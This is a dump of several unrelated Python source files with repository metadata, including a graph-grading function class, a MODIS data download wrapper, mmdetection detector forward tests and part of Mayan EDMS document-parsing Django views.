] | 4 | 2017-10-16T19:35:28.000Z | 2020-08-12T16:17:03.000Z | # """Contains functions and classes for processing function data"""
from __future__ import division
from __future__ import absolute_import
import numpy as np
from .Tag import Tag, Tagables
DEGREES = (3.142/180)
import sys
from . import Gradeable
# helper methods for interface-like class
def _functionId(obj, nFramesUp):
""" Create a string naming the function n frames up on the stack. """
fr = sys._getframe(nFramesUp+1)
co = fr.f_code
return "%s.%s" % (obj.__class__, co.co_name)
def abstractMethod(obj=None):
""" Use this instead of 'pass' for the body of abstract methods. """
raise Exception("Unimplemented abstract method: %s" % _functionId(obj, 1))
# Function "interface"
class Function(Tag, Tagables, object):
"""Base class for Functions."""
# create the Function
# establishes the axes, the size (from the axes), and the tolerance, with default tolerance of 20 pixels
# Function info will be stored in terms of the function itself, not the pixel information
# the actual path is yet to be specified
def __init__(self, xaxis, yaxis, path_info = [], tolerance = dict()):
super(Function, self).__init__()
self.xaxis = xaxis
self.yaxis = yaxis
self.width = xaxis.pixels
self.height = yaxis.pixels
self.xscale = 1.0 * self.width / (xaxis.domain[1] - xaxis.domain[0])
self.yscale = 1.0 * self.height / (yaxis.domain[0] - yaxis.domain[1])
self.tolerance = tolerance
self.set_default_tolerance('pixel', 20)
self.set_default_tolerance('comparison', 20)
self.create_from_path_info(path_info)
# check if it is a function, and do something it is not
# helper methods for constructor
def set_default_tolerance(self, key, default_value):
if key not in self.tolerance:
self.tolerance[key] = default_value
def set_tolerance(self, key, value):
self.tolerance[key] = value
# sets the variables related to the path, and finds the domain
def create_from_path_info(self, path_info):
abstractMethod(self)
self.domain = []
## methods to handle pixel <-> math conversions
def xval_to_px(self, xval):
return self.xaxis.coord_to_pixel(xval)
def px_to_xval(self, px):
return self.xaxis.pixel_to_coord(px)
def yval_to_px(self, yval):
return self.yaxis.coord_to_pixel(yval)
def px_to_yval(self, px):
return self.yaxis.pixel_to_coord(px)
## methods for getting various properties of the function at certain locations
# done in math space, not pixel space
def is_between(self, xmin, xmax):
[xleft, xright] = self.domain
if xleft > xmax or xright < xmin:
return False
else:
return True
def between_vals(self, xmin, xmax):
xleft = max(xmin, self.domain[0])
xright = min(xmax, self.domain[1])
# print 'bv', xmin, xmax, xleft, xright
return xleft, xright
def get_value_at(self, xval):
abstractMethod(self)
def get_angle_at(self, xval):
abstractMethod(self)
def get_slope_at(self, xval):
abstractMethod(self)
# def get_mean_value_between(self, xmin, xmax):
# abstractMethod(self)
def get_min_value_between(self, xmin, xmax):
abstractMethod(self)
def get_max_value_between(self, xmin, xmax):
abstractMethod(self)
def get_mean_angle_between(self, xmin, xmax):
# angle = np.arctan2(self.get_value_at(xmax) - self.get_value_at(xmin), xmax - xmin)
# return angle
abstractMethod(self)
def get_min_angle_between(self, xmin, xmax):
abstractMethod(self)
def get_max_angle_between(self, xmin, xmax):
abstractMethod(self)
def get_horizontal_line_crossings(self, yval):
abstractMethod(self)
def get_vertical_line_crossing(self, xval):
abstractMethod(self)
def get_domain(self):
abstractMethod(self)
### Grader functions ###
def is_a_function(self):
abstractMethod(self)
def has_value_y_at_x(self, y, x, yTolerance=None, xTolerance=None):
"""Return whether the function has the value y at x.
Args:
y: the target y value.
x: the x value.
yTolerance(default:None): the y-axis pixel distance within which
the function value is accepted.
xTolerance(default:None): the x-axis pixel distance within which
the function value is accepted.
Returns:
bool:
true if the function value at x is y within tolerances, otherwise
false
"""
if yTolerance is None:
yTolerance = self.tolerance['pixel'] / self.yscale
else:
yTolerance /= self.yscale
if xTolerance is None:
xTolerance = self.tolerance['pixel'] / self.xscale
else:
xTolerance /= self.xscale
# if the min value of the function around the desired x is higher than the desired y
# or if the max value of the function around the desired x is lower
# then it fails
# note that if the function is defined above and below the function, no matter how far apart, this will allow it
# print 'y, x', y, x
ymax = self.get_max_value_between(x - xTolerance, x + xTolerance)
ymin = self.get_min_value_between(x - xTolerance, x + xTolerance)
if ymax is not False and ymin is not False:
return (ymax > y - yTolerance) and (ymin < y + yTolerance)
else:
return False
def is_zero_at_x_equals_zero(self, yTolerance=None, xTolerance=None):
"""Return whether the function is zero at x equals zero.
Args:
yTolerance(default:None): the y-axis pixel distance within which
the function value is accepted.
xTolerance(default:None): the x-axis pixel distance within which
the function value is accepted.
Returns:
bool:
true if the function value at x equals zero is zero within
tolerances, otherwise false
"""
return self.has_value_y_at_x(0, 0, yTolerance=yTolerance,
xTolerance=xTolerance)
def is_greater_than_y_between(self, y, xmin, xmax, tolerance=None):
"""Return whether function is always greater than y in the range xmin to xmax.
Args:
y: the target y value.
xmin: the minimum x range value.
xmax: the maximum x range value.
tolerance(default:None): pixel distance tolerance. If None given uses
default constant 'comparison'.
Returns:
bool:
true if the minimum value of the function in the range (xmin,xmax)
is greater than y within tolerances, otherwise false.
"""
if tolerance is None:
tolerance = self.tolerance['comparison'] / self.yscale
else:
tolerance /= self.yscale
return self.get_min_value_between(xmin, xmax) > y - tolerance
def is_less_than_y_between(self, y, xmin, xmax, tolerance=None):
"""Return whether function is always less than y in the range xmin to xmax.
Args:
y: the target y value.
xmin: the minimum x range value.
xmax: the maximum x range value.
tolerance(default:None): pixel distance tolerance. If None given uses
default constant 'comparison'.
Returns:
bool:
true if the maximum value of the function in the range (xmin,xmax)
is less than y within tolerances, otherwise false.
"""
if tolerance is None:
tolerance = self.tolerance['comparison'] / self.yscale
else:
tolerance /= self.yscale
return self.get_max_value_between(xmin, xmax) < y + tolerance
| 34.888412 | 120 | 0.622217 |
906911366b550eafc1cb245f021457817db4acc0 | 796 | py | Python | Collect/MOD17/NPP_yearly.py | TimHessels/watertools | 77bb412a72f068d255d614f4f8a8f2cfb7d78a26 | [
"Apache-2.0"
] | 3 | 2021-01-26T11:21:31.000Z | 2021-12-31T21:28:18.000Z | Collect/MOD17/NPP_yearly.py | TimHessels/watertools | 77bb412a72f068d255d614f4f8a8f2cfb7d78a26 | [
"Apache-2.0"
] | null | null | null | Collect/MOD17/NPP_yearly.py | TimHessels/watertools | 77bb412a72f068d255d614f4f8a8f2cfb7d78a26 | [
"Apache-2.0"
] | 4 | 2019-01-02T06:45:55.000Z | 2021-06-30T11:51:38.000Z | import sys
from watertools.Collect.MOD17.DataAccessNPP import DownloadData
def main(Dir, Startdate, Enddate, latlim, lonlim, cores=False, Waitbar = 1, hdf_library = None, remove_hdf = 1):
"""
This function downloads MOD17 yearly NPP data for the specified time
interval, and spatial extent.
Keyword arguments:
Dir -- 'C:/file/to/path/'
Startdate -- 'yyyy-mm-dd'
Enddate -- 'yyyy-mm-dd'
latlim -- [ymin, ymax]
lonlim -- [xmin, xmax]
cores -- amount of cores used
Waitbar -- 1 (Default) will print a waitbar
"""
print('\nDownload yearly MODIS NPP data for period %s till %s' %(Startdate, Enddate))
DownloadData(Dir, Startdate, Enddate, latlim, lonlim, Waitbar, cores, hdf_library, remove_hdf)
if __name__ == '__main__':
main(sys.argv) | 34.608696 | 112 | 0.680905 |
1ec2bb16d12a4319fb9ebbd0f7d282f1307b7658 | 250 | py | Python | filterpy/wavhex.py | nyaxt/dmix | 8407c977562aa6145f8c5827b3881c3eb51011a7 | [
"MIT"
] | null | null | null | filterpy/wavhex.py | nyaxt/dmix | 8407c977562aa6145f8c5827b3881c3eb51011a7 | [
"MIT"
] | null | null | null | filterpy/wavhex.py | nyaxt/dmix | 8407c977562aa6145f8c5827b3881c3eb51011a7 | [
"MIT"
] | 1 | 2018-08-12T18:47:05.000Z | 2018-08-12T18:47:05.000Z | import sys
import wave
import struct
wi = wave.open(sys.argv[1], 'r')
# n = wi.getnframes()
n = 100000
ai = struct.unpack('h'*n, wi.readframes(n))
bo = open(sys.argv[2], 'w')
for e in ai:
bo.write("%06x\n" % ((e * 0x100) & 0xffffff))
bo.close()
| 16.666667 | 47 | 0.616 |
f7ea22c849e88cb6ec23b7fce557889423f5588a | 53 | py | Python | tests/lif/if_not_eq.py | Mieschendahl/assignment-final-stub | 19eea657fcc4f8a455c42028f34b918628514cc0 | [
"MIT"
] | null | null | null | tests/lif/if_not_eq.py | Mieschendahl/assignment-final-stub | 19eea657fcc4f8a455c42028f34b918628514cc0 | [
"MIT"
] | 1 | 2022-03-20T11:08:45.000Z | 2022-03-20T11:08:45.000Z | tests/lif/if_not_eq.py | Mieschendahl/assignment-final-stub | 19eea657fcc4f8a455c42028f34b918628514cc0 | [
"MIT"
] | 6 | 2022-03-13T13:10:25.000Z | 2022-03-28T22:18:12.000Z | x = 1
print(777 if (not (x == input_int())) else 42)
| 17.666667 | 46 | 0.584906 |
dc06d60b56c47248c23fa36a24ac0adbdefc621f | 22,110 | py | Python | tests/test_models/test_forward.py | hmtrii/mmdetection | a998e0ac45118482b4a1fa320c2f0611f35fb0d1 | [
"Apache-2.0"
] | null | null | null | tests/test_models/test_forward.py | hmtrii/mmdetection | a998e0ac45118482b4a1fa320c2f0611f35fb0d1 | [
"Apache-2.0"
] | null | null | null | tests/test_models/test_forward.py | hmtrii/mmdetection | a998e0ac45118482b4a1fa320c2f0611f35fb0d1 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) OpenMMLab. All rights reserved.
"""pytest tests/test_forward.py."""
import copy
from os.path import dirname, exists, join
import numpy as np
import pytest
import torch
def _get_config_directory():
"""Find the predefined detector config directory."""
try:
# Assume we are running in the source mmdetection repo
repo_dpath = dirname(dirname(dirname(__file__)))
except NameError:
# For IPython development when this __file__ is not defined
import mmdet
repo_dpath = dirname(dirname(mmdet.__file__))
config_dpath = join(repo_dpath, 'configs')
if not exists(config_dpath):
raise Exception('Cannot find config path')
return config_dpath
def _get_config_module(fname):
"""Load a configuration as a python module."""
from mmcv import Config
config_dpath = _get_config_directory()
config_fpath = join(config_dpath, fname)
config_mod = Config.fromfile(config_fpath)
return config_mod
def _get_detector_cfg(fname):
"""Grab configs necessary to create a detector.
These are deep copied to allow for safe modification of parameters without
influencing other tests.
"""
config = _get_config_module(fname)
model = copy.deepcopy(config.model)
return model
def _replace_r50_with_r18(model):
"""Replace ResNet50 with ResNet18 in config."""
model = copy.deepcopy(model)
if model.backbone.type == 'ResNet':
model.backbone.depth = 18
model.backbone.base_channels = 2
model.neck.in_channels = [2, 4, 8, 16]
return model
def test_sparse_rcnn_forward():
config_path = 'sparse_rcnn/sparse_rcnn_r50_fpn_1x_coco.py'
model = _get_detector_cfg(config_path)
model = _replace_r50_with_r18(model)
model.backbone.init_cfg = None
from mmdet.models import build_detector
detector = build_detector(model)
detector.init_weights()
input_shape = (1, 3, 100, 100)
mm_inputs = _demo_mm_inputs(input_shape, num_items=[5])
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
# Test forward train with non-empty truth batch
detector.train()
gt_bboxes = mm_inputs['gt_bboxes']
gt_bboxes = [item for item in gt_bboxes]
gt_labels = mm_inputs['gt_labels']
gt_labels = [item for item in gt_labels]
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
assert float(loss.item()) > 0
detector.forward_dummy(imgs)
# Test forward train with an empty truth batch
mm_inputs = _demo_mm_inputs(input_shape, num_items=[0])
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
gt_bboxes = mm_inputs['gt_bboxes']
gt_bboxes = [item for item in gt_bboxes]
gt_labels = mm_inputs['gt_labels']
gt_labels = [item for item in gt_labels]
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
assert float(loss.item()) > 0
# Test forward test
detector.eval()
with torch.no_grad():
img_list = [g[None, :] for g in imgs]
batch_results = []
for one_img, one_meta in zip(img_list, img_metas):
result = detector.forward([one_img], [[one_meta]],
rescale=True,
return_loss=False)
batch_results.append(result)
# test empty proposal in roi_head
with torch.no_grad():
# test no proposal in the whole batch
detector.roi_head.simple_test([imgs[0][None, :]], torch.empty(
(1, 0, 4)), torch.empty((1, 100, 4)), [img_metas[0]],
torch.ones((1, 4)))
def test_rpn_forward():
model = _get_detector_cfg('rpn/rpn_r50_fpn_1x_coco.py')
model = _replace_r50_with_r18(model)
model.backbone.init_cfg = None
from mmdet.models import build_detector
detector = build_detector(model)
input_shape = (1, 3, 100, 100)
mm_inputs = _demo_mm_inputs(input_shape)
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
# Test forward train
gt_bboxes = mm_inputs['gt_bboxes']
losses = detector.forward(
imgs, img_metas, gt_bboxes=gt_bboxes, return_loss=True)
assert isinstance(losses, dict)
# Test forward test
with torch.no_grad():
img_list = [g[None, :] for g in imgs]
batch_results = []
for one_img, one_meta in zip(img_list, img_metas):
result = detector.forward([one_img], [[one_meta]],
return_loss=False)
batch_results.append(result)
@pytest.mark.parametrize(
'cfg_file',
[
'retinanet/retinanet_r50_fpn_1x_coco.py',
'guided_anchoring/ga_retinanet_r50_fpn_1x_coco.py',
'ghm/retinanet_ghm_r50_fpn_1x_coco.py',
'fcos/fcos_center_r50_caffe_fpn_gn-head_1x_coco.py',
'foveabox/fovea_align_r50_fpn_gn-head_4x4_2x_coco.py',
# 'free_anchor/retinanet_free_anchor_r50_fpn_1x_coco.py',
# 'atss/atss_r50_fpn_1x_coco.py', # not ready for topk
'reppoints/reppoints_moment_r50_fpn_1x_coco.py',
'yolo/yolov3_mobilenetv2_320_300e_coco.py',
'yolox/yolox_tiny_8x8_300e_coco.py'
])
def test_single_stage_forward_gpu(cfg_file):
if not torch.cuda.is_available():
import pytest
pytest.skip('test requires GPU and torch+cuda')
model = _get_detector_cfg(cfg_file)
model = _replace_r50_with_r18(model)
model.backbone.init_cfg = None
from mmdet.models import build_detector
detector = build_detector(model)
input_shape = (2, 3, 128, 128)
mm_inputs = _demo_mm_inputs(input_shape)
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
detector = detector.cuda()
imgs = imgs.cuda()
# Test forward train
gt_bboxes = [b.cuda() for b in mm_inputs['gt_bboxes']]
gt_labels = [g.cuda() for g in mm_inputs['gt_labels']]
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
# Test forward test
with torch.no_grad():
img_list = [g[None, :] for g in imgs]
batch_results = []
for one_img, one_meta in zip(img_list, img_metas):
result = detector.forward([one_img], [[one_meta]],
return_loss=False)
batch_results.append(result)
def test_faster_rcnn_ohem_forward():
model = _get_detector_cfg(
'faster_rcnn/faster_rcnn_r50_fpn_ohem_1x_coco.py')
model = _replace_r50_with_r18(model)
model.backbone.init_cfg = None
from mmdet.models import build_detector
detector = build_detector(model)
input_shape = (1, 3, 100, 100)
# Test forward train with a non-empty truth batch
mm_inputs = _demo_mm_inputs(input_shape, num_items=[10])
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
gt_bboxes = mm_inputs['gt_bboxes']
gt_labels = mm_inputs['gt_labels']
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
assert float(loss.item()) > 0
# Test forward train with an empty truth batch
mm_inputs = _demo_mm_inputs(input_shape, num_items=[0])
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
gt_bboxes = mm_inputs['gt_bboxes']
gt_labels = mm_inputs['gt_labels']
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
assert float(loss.item()) > 0
@pytest.mark.parametrize(
'cfg_file',
[
# 'cascade_rcnn/cascade_mask_rcnn_r50_fpn_1x_coco.py',
'mask_rcnn/mask_rcnn_r50_fpn_1x_coco.py',
# 'grid_rcnn/grid_rcnn_r50_fpn_gn-head_2x_coco.py',
# 'ms_rcnn/ms_rcnn_r50_fpn_1x_coco.py',
# 'htc/htc_r50_fpn_1x_coco.py',
# 'panoptic_fpn/panoptic_fpn_r50_fpn_1x_coco.py',
# 'scnet/scnet_r50_fpn_20e_coco.py',
# 'seesaw_loss/mask_rcnn_r50_fpn_random_seesaw_loss_normed_mask_mstrain_2x_lvis_v1.py' # noqa: E501
])
def test_two_stage_forward(cfg_file):
models_with_semantic = [
'htc/htc_r50_fpn_1x_coco.py',
'panoptic_fpn/panoptic_fpn_r50_fpn_1x_coco.py',
'scnet/scnet_r50_fpn_20e_coco.py',
]
if cfg_file in models_with_semantic:
with_semantic = True
else:
with_semantic = False
model = _get_detector_cfg(cfg_file)
model = _replace_r50_with_r18(model)
model.backbone.init_cfg = None
# Save cost
if cfg_file in [
'seesaw_loss/mask_rcnn_r50_fpn_random_seesaw_loss_normed_mask_mstrain_2x_lvis_v1.py' # noqa: E501
]:
model.roi_head.bbox_head.num_classes = 80
model.roi_head.bbox_head.loss_cls.num_classes = 80
model.roi_head.mask_head.num_classes = 80
model.test_cfg.rcnn.score_thr = 0.05
model.test_cfg.rcnn.max_per_img = 100
from mmdet.models import build_detector
detector = build_detector(model)
input_shape = (1, 3, 128, 128)
# Test forward train with a non-empty truth batch
mm_inputs = _demo_mm_inputs(
input_shape, num_items=[10], with_semantic=with_semantic)
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
losses = detector.forward(imgs, img_metas, return_loss=True, **mm_inputs)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
loss.requires_grad_(True)
assert float(loss.item()) > 0
loss.backward()
# Test forward train with an empty truth batch
mm_inputs = _demo_mm_inputs(
input_shape, num_items=[0], with_semantic=with_semantic)
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
losses = detector.forward(imgs, img_metas, return_loss=True, **mm_inputs)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
loss.requires_grad_(True)
assert float(loss.item()) > 0
loss.backward()
# Test forward test
with torch.no_grad():
img_list = [g[None, :] for g in imgs]
batch_results = []
for one_img, one_meta in zip(img_list, img_metas):
result = detector.forward([one_img], [[one_meta]],
return_loss=False)
batch_results.append(result)
cascade_models = [
'cascade_rcnn/cascade_mask_rcnn_r50_fpn_1x_coco.py',
'htc/htc_r50_fpn_1x_coco.py',
'scnet/scnet_r50_fpn_20e_coco.py',
]
# test empty proposal in roi_head
with torch.no_grad():
# test no proposal in the whole batch
detector.simple_test(
imgs[0][None, :], [img_metas[0]], proposals=[torch.empty((0, 4))])
# test no proposal of aug
features = detector.extract_feats([imgs[0][None, :]] * 2)
detector.roi_head.aug_test(features, [torch.empty((0, 4))] * 2,
[[img_metas[0]]] * 2)
# test rcnn_test_cfg is None
if cfg_file not in cascade_models:
feature = detector.extract_feat(imgs[0][None, :])
bboxes, scores = detector.roi_head.simple_test_bboxes(
feature, [img_metas[0]], [torch.empty((0, 4))], None)
assert all([bbox.shape == torch.Size((0, 4)) for bbox in bboxes])
assert all([
score.shape == torch.Size(
(0, detector.roi_head.bbox_head.fc_cls.out_features))
for score in scores
])
# test no proposal in the some image
x1y1 = torch.randint(1, 100, (10, 2)).float()
# x2y2 must be greater than x1y1
x2y2 = x1y1 + torch.randint(1, 100, (10, 2))
detector.simple_test(
imgs[0][None, :].repeat(2, 1, 1, 1), [img_metas[0]] * 2,
proposals=[torch.empty((0, 4)),
torch.cat([x1y1, x2y2], dim=-1)])
# test no proposal of aug
detector.roi_head.aug_test(
features, [torch.cat([x1y1, x2y2], dim=-1),
torch.empty((0, 4))], [[img_metas[0]]] * 2)
# test rcnn_test_cfg is None
if cfg_file not in cascade_models:
feature = detector.extract_feat(imgs[0][None, :].repeat(
2, 1, 1, 1))
bboxes, scores = detector.roi_head.simple_test_bboxes(
feature, [img_metas[0]] * 2,
[torch.empty((0, 4)),
torch.cat([x1y1, x2y2], dim=-1)], None)
assert bboxes[0].shape == torch.Size((0, 4))
assert scores[0].shape == torch.Size(
(0, detector.roi_head.bbox_head.fc_cls.out_features))
@pytest.mark.parametrize(
'cfg_file', ['ghm/retinanet_ghm_r50_fpn_1x_coco.py', 'ssd/ssd300_coco.py'])
def test_single_stage_forward_cpu(cfg_file):
model = _get_detector_cfg(cfg_file)
model = _replace_r50_with_r18(model)
model.backbone.init_cfg = None
from mmdet.models import build_detector
detector = build_detector(model)
input_shape = (1, 3, 300, 300)
mm_inputs = _demo_mm_inputs(input_shape)
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
# Test forward train
gt_bboxes = mm_inputs['gt_bboxes']
gt_labels = mm_inputs['gt_labels']
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
# Test forward test
with torch.no_grad():
img_list = [g[None, :] for g in imgs]
batch_results = []
for one_img, one_meta in zip(img_list, img_metas):
result = detector.forward([one_img], [[one_meta]],
return_loss=False)
batch_results.append(result)
def _demo_mm_inputs(input_shape=(1, 3, 300, 300),
num_items=None, num_classes=10,
with_semantic=False): # yapf: disable
"""Create a superset of inputs needed to run test or train batches.
Args:
input_shape (tuple):
input batch dimensions
num_items (None | List[int]):
specifies the number of boxes in each batch item
num_classes (int):
number of different labels a box might have
"""
from mmdet.core import BitmapMasks
(N, C, H, W) = input_shape
rng = np.random.RandomState(0)
imgs = rng.rand(*input_shape)
img_metas = [{
'img_shape': (H, W, C),
'ori_shape': (H, W, C),
'pad_shape': (H, W, C),
'filename': '<demo>.png',
'scale_factor': np.array([1.1, 1.2, 1.1, 1.2]),
'flip': False,
'flip_direction': None,
} for _ in range(N)]
gt_bboxes = []
gt_labels = []
gt_masks = []
for batch_idx in range(N):
if num_items is None:
num_boxes = rng.randint(1, 10)
else:
num_boxes = num_items[batch_idx]
cx, cy, bw, bh = rng.rand(num_boxes, 4).T
tl_x = ((cx * W) - (W * bw / 2)).clip(0, W)
tl_y = ((cy * H) - (H * bh / 2)).clip(0, H)
br_x = ((cx * W) + (W * bw / 2)).clip(0, W)
br_y = ((cy * H) + (H * bh / 2)).clip(0, H)
boxes = np.vstack([tl_x, tl_y, br_x, br_y]).T
class_idxs = rng.randint(1, num_classes, size=num_boxes)
gt_bboxes.append(torch.FloatTensor(boxes))
gt_labels.append(torch.LongTensor(class_idxs))
mask = np.random.randint(0, 2, (len(boxes), H, W), dtype=np.uint8)
gt_masks.append(BitmapMasks(mask, H, W))
mm_inputs = {
'imgs': torch.FloatTensor(imgs).requires_grad_(True),
'img_metas': img_metas,
'gt_bboxes': gt_bboxes,
'gt_labels': gt_labels,
'gt_bboxes_ignore': None,
'gt_masks': gt_masks,
}
if with_semantic:
# assume gt_semantic_seg using scale 1/8 of the img
gt_semantic_seg = np.random.randint(
0, num_classes, (1, 1, H // 8, W // 8), dtype=np.uint8)
mm_inputs.update(
{'gt_semantic_seg': torch.ByteTensor(gt_semantic_seg)})
return mm_inputs
def test_yolact_forward():
model = _get_detector_cfg('yolact/yolact_r50_1x8_coco.py')
model = _replace_r50_with_r18(model)
model.backbone.init_cfg = None
from mmdet.models import build_detector
detector = build_detector(model)
input_shape = (1, 3, 100, 100)
mm_inputs = _demo_mm_inputs(input_shape)
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
# Test forward train
detector.train()
gt_bboxes = mm_inputs['gt_bboxes']
gt_labels = mm_inputs['gt_labels']
gt_masks = mm_inputs['gt_masks']
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
gt_masks=gt_masks,
return_loss=True)
assert isinstance(losses, dict)
# Test forward test
detector.eval()
with torch.no_grad():
img_list = [g[None, :] for g in imgs]
batch_results = []
for one_img, one_meta in zip(img_list, img_metas):
result = detector.forward([one_img], [[one_meta]],
rescale=True,
return_loss=False)
batch_results.append(result)
def test_detr_forward():
model = _get_detector_cfg('detr/detr_r50_8x2_150e_coco.py')
model.backbone.depth = 18
model.bbox_head.in_channels = 512
model.backbone.init_cfg = None
from mmdet.models import build_detector
detector = build_detector(model)
input_shape = (1, 3, 100, 100)
mm_inputs = _demo_mm_inputs(input_shape)
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
# Test forward train with non-empty truth batch
detector.train()
gt_bboxes = mm_inputs['gt_bboxes']
gt_labels = mm_inputs['gt_labels']
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
assert float(loss.item()) > 0
# Test forward train with an empty truth batch
mm_inputs = _demo_mm_inputs(input_shape, num_items=[0])
imgs = mm_inputs.pop('imgs')
img_metas = mm_inputs.pop('img_metas')
gt_bboxes = mm_inputs['gt_bboxes']
gt_labels = mm_inputs['gt_labels']
losses = detector.forward(
imgs,
img_metas,
gt_bboxes=gt_bboxes,
gt_labels=gt_labels,
return_loss=True)
assert isinstance(losses, dict)
loss, _ = detector._parse_losses(losses)
assert float(loss.item()) > 0
# Test forward test
detector.eval()
with torch.no_grad():
img_list = [g[None, :] for g in imgs]
batch_results = []
for one_img, one_meta in zip(img_list, img_metas):
result = detector.forward([one_img], [[one_meta]],
rescale=True,
return_loss=False)
batch_results.append(result)
def test_inference_detector():
from mmdet.apis import inference_detector
from mmdet.models import build_detector
from mmcv import ConfigDict
# small RetinaNet
num_class = 3
model_dict = dict(
type='RetinaNet',
backbone=dict(
type='ResNet',
depth=18,
num_stages=4,
out_indices=(3, ),
norm_cfg=dict(type='BN', requires_grad=False),
norm_eval=True,
style='pytorch'),
neck=None,
bbox_head=dict(
type='RetinaHead',
num_classes=num_class,
in_channels=512,
stacked_convs=1,
feat_channels=256,
anchor_generator=dict(
type='AnchorGenerator',
octave_base_scale=4,
scales_per_octave=3,
ratios=[0.5],
strides=[32]),
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0]),
),
test_cfg=dict(
nms_pre=1000,
min_bbox_size=0,
score_thr=0.05,
nms=dict(type='nms', iou_threshold=0.5),
max_per_img=100))
rng = np.random.RandomState(0)
img1 = rng.rand(100, 100, 3)
img2 = rng.rand(100, 100, 3)
model = build_detector(ConfigDict(model_dict))
config = _get_config_module('retinanet/retinanet_r50_fpn_1x_coco.py')
model.cfg = config
# test single image
result = inference_detector(model, img1)
assert len(result) == num_class
# test multiple image
result = inference_detector(model, [img1, img2])
assert len(result) == 2 and len(result[0]) == num_class
| 34.173107 | 111 | 0.604568 |
5256fc7c6d0c5384aabe91d5ebf9201c1f38571a | 6,449 | py | Python | mayan/apps/document_parsing/views.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | 1 | 2021-06-17T18:24:25.000Z | 2021-06-17T18:24:25.000Z | mayan/apps/document_parsing/views.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | 6 | 2020-06-05T22:45:29.000Z | 2022-03-11T23:57:53.000Z | mayan/apps/document_parsing/views.py | Syunkolee9891/Mayan-EDMS | 3759a9503a264a180b74cc8518388f15ca66ac1a | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import, unicode_literals
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.urls import reverse_lazy
from django.utils.translation import ugettext_lazy as _, ungettext
from mayan.apps.common.generics import (
FormView, MultipleObjectConfirmActionView, SingleObjectDetailView,
SingleObjectDownloadView, SingleObjectEditView, SingleObjectListView
)
from mayan.apps.common.mixins import ExternalObjectMixin
from mayan.apps.documents.forms import DocumentTypeFilteredSelectForm
from mayan.apps.documents.models import Document, DocumentPage, DocumentType
from .forms import DocumentContentForm, DocumentPageContentForm
from .models import DocumentVersionParseError
from .permissions import (
permission_content_view, permission_document_type_parsing_setup,
permission_parse_document
)
from .utils import get_document_content
class DocumentContentView(SingleObjectDetailView):
form_class = DocumentContentForm
model = Document
object_permission = permission_content_view
def dispatch(self, request, *args, **kwargs):
result = super(DocumentContentView, self).dispatch(
request, *args, **kwargs
)
self.get_object().add_as_recent_document_for_user(request.user)
return result
def get_extra_context(self):
return {
'document': self.get_object(),
'hide_labels': True,
'object': self.get_object(),
'title': _('Content for document: %s') % self.get_object(),
}
class DocumentContentDownloadView(SingleObjectDownloadView):
model = Document
object_permission = permission_content_view
def get_file(self):
file_object = DocumentContentDownloadView.TextIteratorIO(
iterator=get_document_content(document=self.get_object())
)
return DocumentContentDownloadView.VirtualFile(
file=file_object, name='{}-content'.format(self.get_object())
)
class DocumentPageContentView(SingleObjectDetailView):
form_class = DocumentPageContentForm
model = DocumentPage
object_permission = permission_content_view
def dispatch(self, request, *args, **kwargs):
result = super(DocumentPageContentView, self).dispatch(
request, *args, **kwargs
)
self.get_object().document.add_as_recent_document_for_user(
request.user
)
return result
def get_extra_context(self):
return {
'hide_labels': True,
'object': self.get_object(),
'title': _('Content for document page: %s') % self.get_object(),
}
class DocumentParsingErrorsListView(SingleObjectListView):
view_permission = permission_content_view
def get_document(self):
return get_object_or_404(klass=Document, pk=self.kwargs['pk'])
def get_extra_context(self):
return {
'hide_object': True,
'object': self.get_document(),
'title': _(
'Parsing errors for document: %s'
) % self.get_document(),
}
def get_source_queryset(self):
return self.get_document().latest_version.parsing_errors.all()
class DocumentSubmitView(MultipleObjectConfirmActionView):
model = Document
object_permission = permission_parse_document
success_message = _(
'%(count)d document added to the parsing queue'
)
success_message_plural = _(
'%(count)d documents added to the parsing queue'
)
def get_extra_context(self):
queryset = self.object_list
result = {
